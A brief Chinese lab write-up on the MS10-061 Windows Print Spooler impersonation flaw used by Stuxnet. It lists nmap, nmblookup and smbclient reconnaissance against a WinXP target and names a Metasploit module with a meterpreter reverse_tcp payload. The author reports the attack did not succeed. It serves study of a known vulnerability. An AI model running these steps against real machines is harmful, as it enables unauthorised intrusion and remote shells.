目录
讲在前面
此漏洞中文称为:打印后台程序服务模拟漏洞。目前所有的研究文章总结的漏洞成因为:Windows打印后台程序没有充分的限制访问该服务的问题,攻击者可以对其发起恶意请求间接的在Windows系统目录(%SystemRoot%\System32)中创建文件。该漏洞首次被发现并被利用于著名的
Stuxnet蠕虫
(俗称“震网”)
实验环境
- WinXP
- Kali
实验步骤
一、开启WinXP上打印机共享服务
打开控制面板,找到“打印机和传真”,双击打开后,右键选择“添加打印机”。如下地方的配置请注意
二、kali攻击
1、nmap扫描靶机是否正常开启NetBios和RPC服务
nmap -sS -sU -O -p137-139,445, 192.168.1.122
2、查看netbios名称
nmblookup -A 192.168.1.122
3、查看共享SMB共享资源
smbclient -L \\NetBIOS工作站名字 -I 靶机IP -N
或者在主机上执行net share命令
设置参数并攻击
exploit/windows/smb/ms10_061_spoolss
Payload:windows/meterpreter/reverse_tcp
总结:
笔者这里并未验证成功,并且在win7上也未能利用成功该漏洞,按照微软官方预警,是影响XP\2003\2008\win7的
目前未看到有国内研究员的详细研究文章,此处贴出本文借鉴的实验文章